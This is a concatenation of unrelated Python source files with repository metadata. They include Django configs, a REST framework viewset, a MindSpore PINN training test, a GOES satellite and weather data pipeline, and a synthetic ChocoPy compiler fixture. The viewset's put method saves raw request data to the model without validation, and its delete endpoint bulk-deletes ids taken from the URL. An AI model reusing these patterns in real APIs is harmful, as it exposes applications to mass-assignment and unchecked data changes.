| 2023-07-06T16:15:27.272961
| 2021-08-17T07:24:20
| 2021-08-17T07:24:20
| 395,590,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.apps import AppConfig
class TreadmillwebsiteConfig(AppConfig):
    """Django application configuration for the Treadmillwebsite app."""
    # Use 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'Treadmillwebsite'
|
[
"kiranmaharjan89@gmail.com"
] |
kiranmaharjan89@gmail.com
|
66c87d7d3d6df618eec5985290c9a5d2ba36eb39
|
dfaa090887158b35fc19b7274593d78f44658399
|
/Django/mysite9/mysite9/wsgi.py
|
d39d3ab985c3049db075b08a7e9ef7f117e2bb29
|
[] |
no_license
|
Artak2033/Homeworks
|
429c3f5896b6eea52bc6dc7161916afce5d6bd91
|
dbb526ac6ae082b58e58f6204b2106b9ccaf7f58
|
refs/heads/main
| 2023-05-15T14:39:41.992105
| 2021-06-11T12:40:36
| 2021-06-11T12:40:36
| 365,962,275
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for mysite9 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite9.settings')
application = get_wsgi_application()
|
[
"akfartak@mail.ru"
] |
akfartak@mail.ru
|
a1b9c909d2e60fb563ed2c58c3bf28e228f2e771
|
751691a21ed1d8c69c35f3cd9b9fd395dc5c1aa8
|
/{{cookiecutter.项目名称}}/{{cookiecutter.初始化app名称}}/custom_viewset.py
|
10b0164eb8f5f4fa01443e26d36608d2830e48cc
|
[] |
no_license
|
mtianyan/cookiecutter-drf-mtianyan
|
5899847f46e853a0ec5be9bcbf9e7294ce2b70cd
|
b1298f6c5b20149db4589ce127b2e6e0392552b6
|
refs/heads/master
| 2022-12-28T18:26:57.969693
| 2020-10-10T08:29:08
| 2020-10-10T08:29:08
| 275,175,974
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from utils import change_key
class CustomViewSet(viewsets.ModelViewSet):
    """ModelViewSet variant that wraps every response in a {"code": 200, ...}
    envelope instead of DRF's default bodies/status semantics."""
    def retrieve(self, request, *args, **kwargs):
        """Return one object, with its ``status`` field stringified."""
        instance = self.get_object()
        serializer = self.get_serializer(instance)
        res = serializer.data
        if "status" in res.keys():
            # Coerce status to str so clients get a uniform type.
            res["status"] = str(res["status"])
        return Response({
            "code": 200,
            "data": res
        })
    def create(self, request, *args, **kwargs):
        """Standard DRF create flow, but with an envelope body."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response({'code': 200}, status=status.HTTP_201_CREATED, headers=headers)
    def put(self, request, *args, **kwargs):
        """Update an object directly from request.data.

        NOTE(review): this bypasses serializer validation entirely — it
        instantiates the model from raw request.data and saves only the
        non-pk fields (the '修改成功' message means "update succeeded").
        Confirm change_key() sanitizes the payload upstream.
        """
        change_key(request)
        # Every key except the primary key is treated as an updatable field.
        update_fields = [one for one in request.data.keys() if one != self.serializer_class.Meta.model._meta.pk.name]
        self.serializer_class.Meta.model(**request.data).save(update_fields=update_fields)
        return Response({'code': 200, 'msg': '修改成功'})
    # def destroy(self, request, *args, **kwargs):
    #     instance = self.get_object()
    #     self.perform_destroy(instance)
    #     return Response({'code': 200}, status=status.HTTP_200_OK)
    def destroy(self, request, *args, **kwargs):
        """Bulk delete: the pk URL segment may be a comma-separated id list."""
        ids = kwargs["pk"].split(",")
        self.serializer_class.Meta.model.objects.filter(pk__in=ids).delete()
        return Response({
            "code": 200
        })
|
[
"1147727180@qq.com"
] |
1147727180@qq.com
|
21f188524361b8fa84956085533990c2bc3dbde9
|
dcc25b784213b17015d2080a7623c772d474dc22
|
/reproduce/AlphaFold2-Chinese/tests/st/mindelec/networks/test_frequency_domain_maxwell/test_frequency_domain_maxwell.py
|
65c3d50f3c3832682e1414cb4e3413c5f6f49489
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
mindspore-ai/community
|
930c9d9fdbead852e3597d522a72fe5b66bfc005
|
c72ce898482419117550ad16d93b38298f4306a1
|
refs/heads/master
| 2023-07-19T19:43:20.785198
| 2023-07-17T06:51:22
| 2023-07-17T06:51:22
| 250,693,100
| 193
| 10
|
Apache-2.0
| 2022-10-29T10:01:40
| 2020-03-28T02:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 5,395
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
train
"""
import os
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.ops as ops
from mindspore import context, ms_function
from mindspore.common import set_seed
from mindspore.train.callback import LossMonitor
from mindspore.train.loss_scale_manager import DynamicLossScaleManager
from mindelec.solver import Solver, Problem
from mindelec.geometry import Rectangle, create_config_from_edict
from mindelec.common import L2
from mindelec.data import Dataset
from mindelec.operators import SecondOrderGrad as Hessian
from mindelec.loss import Constraints
from src.config import rectangle_sampling_config, helmholtz_2d_config
from src.model import FFNN
from src.dataset import test_data_prepare
from src.callback import PredictCallback, TimeMonitor
set_seed(0)
np.random.seed(0)
print("pid:", os.getpid())
context.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target="Ascend")
# define problem
# define problem
class Helmholtz2D(Problem):
    """2D Helmholtz equation problem for a PINN solver.

    Supplies the PDE residual u_xx + u_yy + k^2 * u on the interior domain and
    a (scaled) Dirichlet residual on the boundary.
    """
    def __init__(self, domain_name, bc_name, net, wavenumber=2):
        # domain_name / bc_name: keys under which sampled points arrive in kwargs
        # net: network whose output u is differentiated
        # wavenumber: k in the Helmholtz equation
        super(Helmholtz2D, self).__init__()
        self.domain_name = domain_name
        self.bc_name = bc_name
        self.type = "Equation"
        self.wave_number = wavenumber
        # Second derivatives of output 0 w.r.t. input coords 0 (x) and 1 (y).
        self.grad_xx = Hessian(net, input_idx1=0, input_idx2=0, output_idx=0)
        self.grad_yy = Hessian(net, input_idx1=1, input_idx2=1, output_idx=0)
        self.reshape = ops.Reshape()
    @ms_function
    def governing_equation(self, *output, **kwargs):
        """PDE residual u_xx + u_yy + k^2 * u on the interior points.

        NOTE(review): x and y below are computed and reshaped but never used
        in the returned expression — kept as-is since this method is
        graph-compiled via @ms_function; consider removing.
        """
        u = output[0]
        x = kwargs[self.domain_name][:, 0]
        y = kwargs[self.domain_name][:, 1]
        x = self.reshape(x, (-1, 1))
        y = self.reshape(y, (-1, 1))
        u_xx = self.grad_xx(kwargs[self.domain_name])
        u_yy = self.grad_yy(kwargs[self.domain_name])
        return u_xx + u_yy + self.wave_number**2 * u
    @ms_function
    def boundary_condition(self, *output, **kwargs):
        """Dirichlet residual on boundary points: u must match sin(k*x).

        The residual is multiplied by 100 to weight the boundary loss
        relative to the PDE loss. y is computed but unused (see note above).
        """
        u = output[0]
        x = kwargs[self.bc_name][:, 0]
        y = kwargs[self.bc_name][:, 1]
        x = self.reshape(x, (-1, 1))
        y = self.reshape(y, (-1, 1))
        test_label = ops.sin(self.wave_number * x)
        return 100 * (u - test_label)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_frequency_domain_maxwell():
    """End-to-end PINN training run for the 2D Helmholtz problem.

    Builds geometry, dataset, constraints, and a Solver; trains for a few
    epochs on Ascend hardware, then asserts the l2 error and per-step time
    stay under fixed thresholds.
    """
    net = FFNN(input_dim=2, output_dim=1, hidden_layer=64)
    # define geometry: a rectangle sampled for interior ("domain") and
    # boundary ("BC") points per the sampling config
    geom_name = "rectangle"
    rect_space = Rectangle(geom_name,
                           coord_min=helmholtz_2d_config["coord_min"],
                           coord_max=helmholtz_2d_config["coord_max"],
                           sampling_config=create_config_from_edict(rectangle_sampling_config))
    geom_dict = {rect_space: ["domain", "BC"]}
    # create dataset for train and test
    train_dataset = Dataset(geom_dict)
    train_data = train_dataset.create_dataset(batch_size=helmholtz_2d_config.get("batch_size", 128),
                                              shuffle=True, drop_remainder=False)
    test_input, test_label = test_data_prepare(helmholtz_2d_config)
    # define problem and constraints; point-set names follow the
    # "<geometry>_<part>_points" convention used by the Dataset
    train_prob_dict = {geom_name: Helmholtz2D(domain_name=geom_name + "_domain_points",
                                              bc_name=geom_name + "_BC_points",
                                              net=net,
                                              wavenumber=helmholtz_2d_config.get("wavenumber", 2)),
                       }
    train_constraints = Constraints(train_dataset, train_prob_dict)
    # optimizer
    optim = nn.Adam(net.trainable_params(), learning_rate=helmholtz_2d_config.get("lr", 1e-4))
    # solver in PINNs mode with mixed precision (O2) and dynamic loss scaling
    solver = Solver(net,
                    optimizer=optim,
                    mode="PINNs",
                    train_constraints=train_constraints,
                    test_constraints=None,
                    amp_level="O2",
                    metrics={'l2': L2(), 'distance': nn.MAE()},
                    loss_scale_manager=DynamicLossScaleManager()
                    )
    # train; PredictCallback tracks l2 error on the held-out grid every 10 steps
    time_cb = TimeMonitor()
    loss_cb = PredictCallback(model=net, predict_interval=10, input_data=test_input, label=test_label)
    solver.train(epoch=helmholtz_2d_config.get("epochs", 10),
                 train_dataset=train_data,
                 callbacks=[time_cb, LossMonitor(), loss_cb])
    per_step_time = time_cb.get_step_time()
    l2_error = loss_cb.get_l2_error()
    print(f'l2 error: {l2_error:.10f}')
    print(f'per step time: {per_step_time:.10f}')
    # Regression thresholds: accuracy and per-step latency.
    assert l2_error <= 0.05
    assert per_step_time <= 10.0
|
[
"deanyuton@gmail.com"
] |
deanyuton@gmail.com
|
410f36205d34f73079693b4e026012216b438744
|
459f88ba61bb0200e9906c7ce3c814bdf01bd278
|
/py.py
|
4080d3abf50fdf5ef84cf5c058bddfcf10ff3ffd
|
[] |
no_license
|
iamanx17/Advance-python
|
3c65104997c748c11ff2e322a8665423ca335b34
|
f04baa817667d4d7f628abbefe712f1ea99a3f57
|
refs/heads/main
| 2023-07-07T21:05:38.981879
| 2021-08-12T13:34:33
| 2021-08-12T13:34:33
| 327,520,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
# Print the same four messages, driven from a tuple instead of four
# separate statements; output is byte-identical.
for message in (
    'Updating this file from vscode!!',
    'Experiment code 4550',
    'Doing one more change',
    'Lets see what will happen',
):
    print(message)
|
[
"32339572+iamanx17@users.noreply.github.com"
] |
32339572+iamanx17@users.noreply.github.com
|
e452bc13a03434c9d222f4461d20512f8a37aa01
|
12418bfcf8e9508375e041ab97f00b88edbf22a4
|
/datagrabber.py
|
4c491c5e864afb9078b3767677e5d5b475cf4a95
|
[] |
no_license
|
dsmaugy/GOES-Weather-ML
|
74a06291a67372ac2967983b59d7511a07ba7746
|
e94a9965a6593551bc11e8ede8828b290168f02b
|
refs/heads/master
| 2020-04-18T01:03:51.165608
| 2019-06-19T04:27:26
| 2019-06-19T04:27:26
| 167,103,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,122
|
py
|
import csv
from os import listdir
from os.path import isfile, join
from datetime import timedelta, datetime
from netCDF4 import Dataset
import time
import timezonefinder
import pytz
import dateutil.parser
import numpy as np
import gcstools
import pickle
# When True, skip GCS downloads and reuse previously fetched SatFiles/ copies.
NO_DOWNLOAD_MODE = False
# Checkpoint/pickle file name; NOTE(review): usage not visible in this chunk -- confirm.
DATE_PICKLE_NAME = "datagrabberdate.pickle"
# NOTE(review): toggle whose consumer is not visible in this chunk -- confirm.
PICKLE_MODE = False
# Gates the diagnostic print statements throughout this module.
VERBOSE_PRINT_MODE = True
class CsvDataGrabber:
    """Streams hourly weather observations for one state's CSV file,
    matching rows against a target UTC (year, month, day, hour)."""
    # initialize a data grabber object
    # state is the file name under WeatherData/
    def __init__(self, state, starting_date=(2017, 8, 1, 1)):
        self.__state = state
        self.__CSV_PATH = "WeatherData/" + str(state)
        self.__file_is_active = False
        self.__csv_reader = csv.DictReader # placeholder until __initialize_csv runs; the class object itself, not a reader instance
        self.__current_date = starting_date
        # (lat, lng) -> timezone name cache; timezonefinder lookups are slow
        self.__timezone_dict = {}
    def __read_csv(self, csv_reader, input_year, input_month, input_day, input_hour):
        """Generator yielding rows whose (DST-adjusted, UTC) timestamp matches
        the requested hour, within a 10-minute early grace window."""
        start_time = time.time()
        tf = timezonefinder.TimezoneFinder()
        for row in csv_reader:
            lat = float(row["LATITUDE"])
            lng = float(row["LONGITUDE"])
            # cache lat/lng -> timezone to save processing time
            if (lat, lng) in self.__timezone_dict:
                timezone_str = self.__timezone_dict[(lat, lng)]
            else:
                timezone_str = tf.timezone_at(lat=lat, lng=lng)
                self.__timezone_dict[(lat, lng)] = timezone_str
            timezone = pytz.timezone(timezone_str)
            row_date = dateutil.parser.parse(row["DATE"])
            # row_date = datetime.strptime(row["DATE"], "%Y-%m-%d %H:%M")
            # make the datetime object timezone-aware
            row_date = timezone.localize(row_date)
            # remove effects of DST by shifting the timestamp forward
            if row_date.dst().seconds > 0:
                updated_row_date = row_date + timedelta(seconds=row_date.dst().seconds)
            else:
                updated_row_date = row_date # utctimetuple doesn't update if we just replace row_date in-place
            year = updated_row_date.utctimetuple().tm_year
            month = updated_row_date.utctimetuple().tm_mon
            day = updated_row_date.utctimetuple().tm_mday
            hour = updated_row_date.utctimetuple().tm_hour
            minute = updated_row_date.utctimetuple().tm_min
            if year == input_year:
                if month == input_month:
                    if day == input_day:
                        # exact hour match at minute 0, with required fields present
                        if hour == input_hour and minute == 0:
                            if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
                                yield row
                        # observations within 10 minutes before the hour also count
                        elif hour + 1 == input_hour:
                            if minute > 50:
                                if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
                                    yield row
                        # rows are time-ordered: once past the target hour, stop
                        elif hour >= input_hour:
                            break
                    # same grace-window rule, special-cased for input_hour == 0
                    # (the 23:5x observations belong to the previous day)
                    elif day + 1 == input_day:
                        if input_hour == 0:
                            if hour == 23:
                                if minute > 50:
                                    if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
                                        yield row
        end_time = time.time()
        if VERBOSE_PRINT_MODE:
            print("Time Elapsed:", end_time - start_time)
            print("Found Entries:")
    def __initialize_csv(self):
        # NOTE(review): the file handle is a local here and is never stored,
        # so it can only be closed via GC; see close_file below.
        csv_file = open(self.__CSV_PATH)
        return csv.DictReader(csv_file, delimiter=",")
    def close_file(self):
        # NOTE(review): BUG — self.csv_file is never assigned anywhere in this
        # class (only a local in __initialize_csv), so calling close_file
        # raises AttributeError. The handle should be saved on self when opened.
        self.csv_file.close()
    def find_row_by_time(self, input_year, input_month, input_day, input_hour):
        """Return matching rows for the given UTC time, deduplicated so each
        station contributes at most one observation per hour."""
        if VERBOSE_PRINT_MODE:
            print("Finding Entry in: %s for %s" % (self.__state, self.__current_date))
        # lazily open the CSV on first use; the reader persists across calls
        if not self.__file_is_active:
            self.__csv_reader = self.__initialize_csv()
            self.__file_is_active = True
        # find the rows for each date in this specified state
        matching_rows = []
        for row in self.__read_csv(self.__csv_reader, input_year, input_month, input_day, input_hour):
            matching_rows.append(row)
        # remove any duplicate data from the same station within the 10 minute grace period
        if len(matching_rows) > 5:
            indexes_to_pop = [] # indexes of rows safe to remove
            for i in range(0, len(matching_rows) - 1):
                name_to_check = matching_rows[i]["STATION"]
                # scan the remainder of the list for the same station
                for j in range(i + 1, len(matching_rows)):
                    if matching_rows[j]["STATION"] == name_to_check: # the station recorded more than one entry in the grace period
                        date_to_check = dateutil.parser.parse(matching_rows[i]["DATE"])
                        date_examined = dateutil.parser.parse(matching_rows[j]["DATE"])
                        if date_to_check.time() < date_examined.time(): # examined time is closer to the hour, get rid of row i
                            if i not in indexes_to_pop:
                                indexes_to_pop.append(i)
                        else:
                            if j not in indexes_to_pop:
                                indexes_to_pop.append(j)
            # remove duplicates from the end so earlier indexes stay valid
            for pop_index in sorted(indexes_to_pop, reverse=True):
                # pop_index is always in range since indexes were deduplicated above
                matching_rows.pop(pop_index)
        if VERBOSE_PRINT_MODE:
            for sanitized_row in matching_rows:
                print(sanitized_row["STATION_NAME"], sanitized_row["DATE"])
        return matching_rows
    def find_row_by_set_time(self):
        """Convenience wrapper using the stored (year, month, day, hour)."""
        return self.find_row_by_time(*self.__current_date)
    def update_time(self, new_date):
        # new_date: (year, month, day, hour) tuple used by find_row_by_set_time
        self.__current_date = new_date
class RadianceDataGrabber:
    """Fetches a GOES ABI-L1b radiance NetCDF file for a fixed timestamp."""

    def __init__(self, time_to_grab):
        # time_to_grab: the scan timestamp passed to gcstools lookups
        self.time = time_to_grab

    def find_rad_by_set_time(self, channel):
        """Return the local path of the radiance file for *channel*.

        Downloads from the public GOES GCS bucket unless NO_DOWNLOAD_MODE is
        set, in which case a previously downloaded SatFiles/ copy is assumed.
        Returns None when the lookup/download fails.
        """
        if not NO_DOWNLOAD_MODE:
            try:
                ncs_file_id = gcstools.get_objectId_at(self.time, product="ABI-L1b-RadC", channel=channel)
                rad_file = gcstools.copy_fromgcs(gcstools.GOES_PUBLIC_BUCKET, ncs_file_id, "SatFiles/SatFile-" + channel)
                if VERBOSE_PRINT_MODE:
                    print("Downloaded", rad_file)
            # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt
            # and SystemExit; Exception keeps the intended best-effort behavior
            # while letting process-control exceptions propagate.
            except Exception:
                return None
            else:
                return rad_file
        else:
            # Offline mode: trust that a prior run left the file in place.
            rad_file = "SatFiles/SatFile-" + channel
            if VERBOSE_PRINT_MODE:
                print("Found", rad_file)
            return rad_file
class DataManager:
    """Pairs GOES radiance imagery with ground weather observations, hour by hour.

    Holds one CsvDataGrabber per state CSV found under WeatherData/ and, for
    each hourly timestamp, produces parallel lists of radiance inputs and
    weather labels suitable for training.
    """

    def __init__(self, starting_date, channels=("C01", "C02", "C03", "C04", "C05", "C06", "C07", "C08", "C09", "C10", "C11", "C12", "C13", "C14", "C15", "C16")):
        # starting_date: (year, month, day, hour); channels: ABI channel names to fetch.
        self.__csv_states = []
        self.__current_date = datetime(year=starting_date[0], month=starting_date[1], day=starting_date[2], hour=starting_date[3])
        self.__channels = channels
        print("No Download Mode is:", NO_DOWNLOAD_MODE)
        self.__load_all_states()

    def __load_all_states(self):
        # Build one CsvDataGrabber per file found in WeatherData/.
        files = [f for f in listdir("WeatherData/") if isfile(join("WeatherData/", f))]
        for state in files:
            self.__csv_states.append(CsvDataGrabber(state))
        return self.__csv_states

    # returns unpadded arrays
    def get_formatted_data(self):
        """Assemble (radiance features, weather labels) for the current hour.

        Returns (None, None) when any channel file is unavailable, otherwise
        two parallel lists: per-station radiance crops (one per channel) and
        per-station [temperature, sky-condition, weather-condition] labels.
        """
        # these lists hold our respective radiance and weather data for this time iteration
        radiance_feature_input = []
        weather_label_output = []
        # get all the radiance channels we're going to be using
        rad_retriever = RadianceDataGrabber(self.__current_date)
        channel_files = []
        for channel in self.__channels:
            rad_file = rad_retriever.find_rad_by_set_time(channel)
            # skip this if the file is missing
            if rad_file == None:
                return None, None
            channel_files.append(rad_file)
        # loops through every STATE in the same TIME
        for s in self.__csv_states:
            # update the time to check in all of the CsvDataGrabbers
            s.update_time((self.__current_date.year, self.__current_date.month, self.__current_date.day, self.__current_date.hour))
            station_entries = s.find_row_by_set_time()
            if len(station_entries) == 0:
                if VERBOSE_PRINT_MODE:
                    print("Empty Dataset, skipping this set time")
                continue
            state_start_time = time.time()
            # loops through every STATION in the SAME STATE
            for entry in station_entries:
                valid_data = True
                channel_rad_data = []
                # loops through every CHANNEL in the SAME STATION
                for file in channel_files:
                    if VERBOSE_PRINT_MODE:
                        print("Getting Radiance Channel " + file + " from " + entry["STATION_NAME"] + "...", end="")
                    with Dataset(file) as nc:
                        rad = nc.variables["Rad"][:]
                        dqf = nc.variables["DQF"][:]
                        # Crop the full-disk image to a window around the station.
                        rad, dqf = gcstools.crop_image(nc, rad, clat=float(entry["LATITUDE"]), clon=float(entry["LONGITUDE"]), dqf=dqf)
                    # make sure that at least 95% of the pixels are good
                    # (DQF > 0 marks a degraded pixel in the cropped window)
                    bad_vals_count = np.count_nonzero(dqf > 0)
                    if bad_vals_count > 500:
                        valid_data = False
                        break
                    channel_rad_data.append(rad)
                    if VERBOSE_PRINT_MODE:
                        print("Done")
                if not valid_data:
                    continue
                try:
                    actual_temp = int(entry["HOURLYDRYBULBTEMPF"])
                    sky_condition = entry["HOURLYSKYCONDITIONS"]
                except:
                    # NOTE(review): bare except deliberately skips rows with missing /
                    # non-numeric fields; consider narrowing to (KeyError, ValueError).
                    continue  # another data check, probably not needed
                if VERBOSE_PRINT_MODE:
                    print("Getting Weather Values from " + entry["STATION_NAME"] + "...", end="")
                # temp label is array of size 201 where -70 degrees F is index 0 and 130 degrees F is index 200, corresponding temp is marked with 1
                temperature_label = np.zeros(201)
                temp_index = actual_temp + 70
                temperature_label[temp_index] = 1
                # Extract the recognized cloud-cover codes from the free-text field.
                filtered_sky_conditions = []
                for word in sky_condition.split():
                    if "CLR" in word:
                        filtered_sky_conditions.append("CLR")
                    elif "FEW" in word:
                        filtered_sky_conditions.append("FEW")
                    elif "SCT" in word:
                        filtered_sky_conditions.append("SCT")
                    elif "BKN" in word:
                        filtered_sky_conditions.append("BKN")
                    elif "OVC" in word:
                        filtered_sky_conditions.append("OVC")
                    elif "VV" in word:
                        filtered_sky_conditions.append("VV")
                if len(filtered_sky_conditions) == 0:
                    continue  # data is weird, skip this one
                # sky label is of size 6 where each index corresponds to the cloud conditions below
                # (only the last reported layer is used)
                sky_condition_label = np.zeros(6)
                sky_condition_to_check = filtered_sky_conditions[-1]
                if sky_condition_to_check == "CLR":  # clear
                    sky_condition_label[0] = 1
                elif sky_condition_to_check == "FEW":  # few clouds
                    sky_condition_label[1] = 1
                elif sky_condition_to_check == "SCT":  # scattered clouds
                    sky_condition_label[2] = 1
                elif sky_condition_to_check == "BKN":  # broken clouds
                    sky_condition_label[3] = 1
                elif sky_condition_to_check == "OVC":  # overcast
                    sky_condition_label[4] = 1
                elif sky_condition_to_check == "VV":  # obscured sky
                    sky_condition_label[5] = 1
                # weather condition label is of size 4 where each index corresponds to the weather condition below
                # note: more than 1 condition can be present
                weather_condition_label = np.zeros(4)
                weather_conditions = entry["HOURLYPRSENTWEATHERTYPE"]
                if "DZ" in weather_conditions or "RA" in weather_conditions or "SH" in weather_conditions:  # rain
                    weather_condition_label[0] = 1
                if "SN" in weather_conditions:  # snow
                    weather_condition_label[1] = 1
                if "BR" in weather_conditions or "FG" in weather_conditions or "HZ" in weather_conditions:  # fog / mist
                    weather_condition_label[2] = 1
                if "TS" in weather_conditions:  # thunderstorms
                    weather_condition_label[3] = 1
                # this list represents all the weather labels for just ONE station
                total_weather_labels = [temperature_label, sky_condition_label, weather_condition_label]
                radiance_feature_input.append(channel_rad_data)
                weather_label_output.append(total_weather_labels)
                if VERBOSE_PRINT_MODE:
                    print("Done")
            state_end_time = time.time()
            if VERBOSE_PRINT_MODE:
                print("Time Elapsed for Data Grabbing:", state_end_time - state_start_time)
                print("-----------------------------")
        return radiance_feature_input, weather_label_output

    def increment_date(self):
        # Advance the working timestamp by one hour.
        self.__current_date = self.__current_date + timedelta(hours=1)

    def get_all_states(self):
        return self.__csv_states

    def get_current_date(self):
        return self.__current_date

    def pickle_date(self):
        # Checkpoint the current timestamp so a later run can resume (see __main__).
        pickle.dump(self.__current_date, open(DATE_PICKLE_NAME, "wb"))

    # for debug purposes
    def print_all_states(self):
        print([f for f in listdir("WeatherData/") if isfile(join("WeatherData/", f))])
if __name__ == "__main__":
    # Resume from the pickled checkpoint when PICKLE_MODE is on; otherwise
    # start from the hard-coded date below.
    if PICKLE_MODE:
        print("Using Pickled Date")
        # NOTE(review): pickle.load on a local checkpoint file — safe only as long
        # as this file is produced exclusively by this script (pickle_date()).
        data_datetime = pickle.load(open(DATE_PICKLE_NAME, "rb"))
        data_date = (data_datetime.year, data_datetime.month, data_datetime.day, data_datetime.hour)
    else:
        data_date = (2017, 2, 1, 0)
        print("Using explicitly set date:", data_date)
    data_retriever = DataManager(starting_date=data_date, channels=["C13", "C14", "C15", "C16"])
    print(data_retriever.print_all_states())
    # Runs indefinitely: each iteration processes one hour of data and
    # checkpoints progress before moving to the next hour.
    while True:
        radiance_features, weather_labels = data_retriever.get_formatted_data()
        # Only save when we actually collected more than one station's worth of data.
        if radiance_features is not None and len(radiance_features) > 1:
            radiance_features_nparray = np.array(radiance_features)
            weather_labels_nparray = np.array(weather_labels)
            save_path = str.format("NumpyDataFiles/{0}-{1}-{2}-{3}", *data_date)
            np.save(save_path + "-rad_feature", radiance_features_nparray)
            np.save(save_path + "-weather_label", weather_labels_nparray)
            print("Successfully saved numpy data!")
        data_retriever.increment_date()
        data_datetime = data_retriever.get_current_date()
        data_date = (data_datetime.year, data_datetime.month, data_datetime.day, data_datetime.hour)
        data_retriever.pickle_date()
        print("Successfully pickled current date")
        print("Done with 1 hour iteration... moving on to ", data_date)
|
[
"darwin78913@gmail.com"
] |
darwin78913@gmail.com
|
f64233795111df760e19371a35a584413081cff7
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/class_def_attr-big-407.py
|
d189ce0fed43c4a777ecf1f02981982293253209
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
# Auto-generated synthetic ChocoPy benchmark fixture (class attribute /
# inheritance test case). `$Literal` on the a3 line is an unfilled generator
# template hole, so this file is intentionally not valid Python as-is —
# do not "fix" it by hand.
class A(object):
    x:int = 1

class A2(object):
    x:int = 1
    x2:int = 1

class A3(object):
    x:int = 1
    x2:int = 1
    x3:int = 1

class A4(object):
    x:int = 1
    x2:int = 1
    x3:int = 1
    x4:int = 1

class A5(object):
    x:int = 1
    x2:int = 1
    x3:int = 1
    x4:int = 1
    x5:int = 1

class B(A):
    def __init__(self: "B"):
        pass

class B2(A):
    def __init__(self: "B2"):
        pass

class B3(A):
    def __init__(self: "B3"):
        pass

class B4(A):
    def __init__(self: "B4"):
        pass

class B5(A):
    def __init__(self: "B5"):
        pass

class C(B):
    z:bool = True

class C2(B):
    z:bool = True
    z2:bool = True

class C3(B):
    z:bool = True
    z2:bool = True
    z3:bool = True

class C4(B):
    z:bool = True
    z2:bool = True
    z3:bool = True
    z4:bool = True

class C5(B):
    z:bool = True
    z2:bool = True
    z3:bool = True
    z4:bool = True
    z5:bool = True

a:A = None
a2:A = None
a3:A = $Literal
a4:A = None
a5:A = None
b:B = None
b2:B = None
b3:B = None
b4:B = None
b5:B = None
c:C = None
c2:C = None
c3:C = None
c4:C = None
c5:C = None
a = A()
a2 = A()
a3 = A()
a4 = A()
a5 = A()
b = B()
b2 = B()
b3 = B()
b4 = B()
b5 = B()
c = C()
c2 = C()
c3 = C()
c4 = C()
c5 = C()
a.x = 1
b.x = a.x
c.z = a.x == b.x
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
b8a72b235685444f3296526d4ae00737b1cc4183
|
cba5017525d30f84f4555bc0e10f1f83126f1d4a
|
/Solar/solarInfo/apps.py
|
2fcdc3f23dfa80d2de63c42f6ff03df6ca0ff227
|
[
"Apache-2.0"
] |
permissive
|
cycmay/SolarS
|
66e97a0de6b459f8bb05b03c2690d9852d92209a
|
284bcafa5da210e5c4200d19e46b3fa6bb5acb20
|
refs/heads/master
| 2020-05-23T18:09:09.760666
| 2019-05-24T15:42:25
| 2019-05-24T15:42:25
| 186,882,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
from django.apps import AppConfig
class SolarConfig(AppConfig):
    """Django application configuration for the solarInfo app."""
    # App label used by Django's app registry (matches the package name).
    name = 'solarInfo'
|
[
"1769614470@qq.com"
] |
1769614470@qq.com
|
b7c6a2da8d1c2ae74e8a0066ec371a381e31082e
|
cba3d1dd5b08a703c7e9e68464beb741eacfeb0d
|
/003_Pandas_tut.py
|
ca014206033cd06400a9a4ed2d444c451e86699b
|
[] |
no_license
|
Fizztech0/Tutorials
|
480b8973deee83ea19ad197761f5bf1e21c4a169
|
dff855b63834507783494543d0c8d3240d0bf145
|
refs/heads/main
| 2023-06-26T21:51:18.522576
| 2021-07-23T18:53:35
| 2021-07-23T18:53:35
| 388,511,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,046
|
py
|
# Pandas tutorial scratch file: each section is a worked example that was run
